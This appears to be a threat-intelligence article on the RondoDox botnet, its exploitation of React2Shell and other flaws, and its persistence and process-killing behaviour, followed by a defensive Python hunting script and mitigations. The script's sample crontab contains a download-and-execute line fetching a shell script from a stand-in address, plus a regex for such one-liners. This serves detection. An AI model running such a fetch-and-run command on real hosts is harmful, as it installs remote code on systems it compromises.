RondoDox Botnet IoT Attack Campaign
Cybersecurity analysts have uncovered a highly persistent campaign lasting approximately nine months that has actively targeted Internet of Things (IoT) devices and web applications. The objective of this operation has been to conscript vulnerable systems into a botnet dubbed RondoDox, demonstrating both patience and operational maturity on the part of the attackers.
React2Shell: The Critical Entry Point
As of December 2025, researchers observed the campaign exploiting React2Shell (CVE-2025-55182) as its primary initial access mechanism. This critical vulnerability, carrying a CVSS score of 10.0, affects React Server Components (RSC) and Next.js implementations. When unpatched, it allows unauthenticated remote code execution, effectively granting attackers full control over exposed systems.
Exposure at Scale: Global Impact
Telemetry collected through late December 2025 indicates that roughly 90,300 vulnerable instances remain exposed worldwide. The majority are located in the United States, accounting for approximately 68,400 systems. Other significantly affected regions include Germany with about 4,300 instances, France with 2,800, and India with 1,500, underscoring the global reach of the issue.
RondoDox Evolves Its Exploit Arsenal
First identified in early 2025, RondoDox has steadily expanded its capabilities by incorporating additional N-day vulnerabilities into its exploitation toolkit. These include CVE-2023-1389 (a command injection in TP-Link Archer AX21 routers) and CVE-2025-24893 (a remote code execution flaw in XWiki). Earlier reporting had already documented the botnet's use of React2Shell, illustrating how quickly the operators weaponize newly disclosed flaws.
Three Phases of Escalation
Before weaponizing CVE-2025-55182, the RondoDox campaign progressed through a structured escalation cycle:
- March–April 2025: Focused reconnaissance paired with manual vulnerability discovery and testing.
- April–June 2025: Daily, large-scale probing of common web platforms such as WordPress, Drupal, and Struts2, alongside IoT hardware, including Wavlink routers.
- July–early December 2025: Fully automated, hourly deployment designed for maximum reach and persistence.
December Attacks: Payloads and Persistence
During the activity observed in December 2025, threat actors scanned for exposed Next.js servers and attempted to deploy multiple malicious components. These included cryptocurrency miners, a botnet loader and health-check utility, and a Mirai-based botnet variant tailored for x86 systems.
A key component, '/nuts/bolts,' plays a defensive role for the attackers. It systematically terminates competing malware and coin miners before retrieving the primary bot binary from its command-and-control (C2) infrastructure. One identified variant aggressively cleans infected hosts by removing traces of rival botnets, Docker-based payloads, remnants of earlier campaigns, and associated cron jobs, while simultaneously establishing persistence through modifications to /etc/crontab.
The malware further enforces exclusivity by continuously scanning the /proc filesystem to identify active executables, terminating any non-whitelisted processes roughly every 45 seconds. This behavior effectively blocks reinfection attempts by other threat actors.
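The two behaviours just described, cron-based persistence and the periodic kill loop over /proc, are also the first things a responder can look for on a suspect host. The script below is an added example written for this page, not RondoDox code and not taken from any vendor report. It parses a crontab in /etc/crontab format and a list of process records of the kind obtained from /proc/<pid>/exe and /proc/<pid>/comm, and flags entries that a responder would examine first: commands or binaries staged in world-writable or RAM-backed directories, download-and-execute one-liners, binaries unlinked after execution, and the '/nuts/bolts' path named above. The heuristics, the sample crontab, the process snapshots and the 198.51.100.7 address are all constructed for illustration; only the '/nuts/bolts' path comes from the article.

```python
"""Hunt for cron persistence and process-killing activity on a Linux host.

Added example for this page; the heuristics are assumptions, not signatures.
Sample inputs below are constructed. The only path taken from the article is
'/nuts/bolts'.
"""
import os
import re
from dataclasses import dataclass

# Heuristics (assumptions): staging from world-writable or RAM-backed dirs,
# download-and-execute one-liners, and the component path the article names.
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOWNLOAD_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")
KNOWN_PATHS = ("/nuts/bolts",)


def parse_cron_line(line):
    """Return (user, command) for a system-crontab line, or None.

    System crontab lines carry five schedule fields (or one '@' keyword)
    followed by the user that runs the command.
    """
    n = 1 if line.startswith("@") else 5
    parts = line.split(None, n + 1)  # keep the command's own spacing
    if len(parts) < n + 2:
        return None
    return parts[n], parts[n + 1]


def suspicious_cron_entries(crontab_text):
    """Return (line_no, user, command, reasons) for entries worth a look."""
    findings = []
    for lineno, raw in enumerate(crontab_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or environment assignment (SHELL=, PATH=)
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        user, cmd = parsed
        reasons = []
        if any(d in cmd for d in SUSPICIOUS_DIRS):
            reasons.append("runs from world-writable dir")
        if DOWNLOAD_RE.search(cmd):
            reasons.append("download-and-execute")
        if any(p in cmd for p in KNOWN_PATHS):
            reasons.append("known component path")
        if reasons:
            findings.append((lineno, user, cmd, reasons))
    return findings


@dataclass(frozen=True)
class Proc:
    pid: int
    exe: str   # readlink of /proc/<pid>/exe; kernel appends ' (deleted)' if unlinked
    comm: str  # contents of /proc/<pid>/comm


def snapshot_live(proc_root="/proc"):
    """Collect Proc records from a live /proc (root needed for other users' exe)."""
    procs = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            exe = os.readlink(f"{proc_root}/{entry}/exe")
            with open(f"{proc_root}/{entry}/comm") as fh:
                comm = fh.read().strip()
        except OSError:  # kernel threads, exited processes, permission denied
            continue
        procs.append(Proc(int(entry), exe, comm))
    return procs


def suspicious_processes(procs):
    """Return (pid, exe, reasons) for processes matching the heuristics."""
    findings = []
    for p in procs:
        reasons = []
        if p.exe.endswith(" (deleted)"):
            reasons.append("binary unlinked after exec")
        if any(p.exe.startswith(d) for d in SUSPICIOUS_DIRS):
            reasons.append("runs from world-writable dir")
        if any(p.exe.startswith(k) for k in KNOWN_PATHS):
            reasons.append("known component path")
        if reasons:
            findings.append((p.pid, p.exe, reasons))
    return findings


def killed_between(before, after):
    """Processes present in the first snapshot but gone in the second.

    Taking two snapshots roughly a minute apart and seeing unrelated daemons
    vanish is the footprint of a kill loop like the one described above.
    """
    after_pids = {p.pid for p in after}
    return [p for p in before if p.pid not in after_pids]


# Constructed sample data (not from any real incident).
SAMPLE_CRONTAB = """SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    /nuts/bolts >/dev/null 2>&1
@reboot         root    curl -s http://198.51.100.7/x.sh | sh
"""

PROCS_BEFORE = [
    Proc(1, "/sbin/init", "init"),
    Proc(412, "/usr/bin/dockerd", "dockerd"),
    Proc(930, "/tmp/.x/miner", "miner"),
    Proc(1044, "/nuts/bolts", "bolts"),
    Proc(1102, "/tmp/bin.x86 (deleted)", "bin.x86"),
]
PROCS_AFTER = [PROCS_BEFORE[0], PROCS_BEFORE[3], PROCS_BEFORE[4]]

if __name__ == "__main__":
    for f in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("cron", f)
    for f in suspicious_processes(PROCS_BEFORE):
        print("proc", f)
    for p in killed_between(PROCS_BEFORE, PROCS_AFTER):
        print("gone", p.pid, p.comm)
```

On a live host, replace the constructed snapshots with two calls to `snapshot_live()` spaced a minute or so apart; a dockerd or sshd that disappears between them with no corresponding service stop is the pattern to chase, and `/proc/<pid>/exe` reporting "(deleted)" means the binary must be recovered from the running process (for example by copying `/proc/<pid>/exe`) before it is killed.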
Reducing Risk and Limiting Exposure
To counter the threat posed by RondoDox, security teams should adopt a layered defensive strategy:
- Promptly upgrade React Server Components and Next.js deployments to releases that address CVE-2025-55182, and verify the running version after deployment rather than relying on the lockfile.
- Isolate IoT devices within dedicated VLANs to limit lateral movement.
- Implement Web Application Firewalls (WAFs) and continuously monitor for anomalous process execution.
- Proactively block known command-and-control infrastructure associated with the botnet.
Taken together, these measures significantly reduce the likelihood of compromise and help contain the impact of ongoing botnet activity.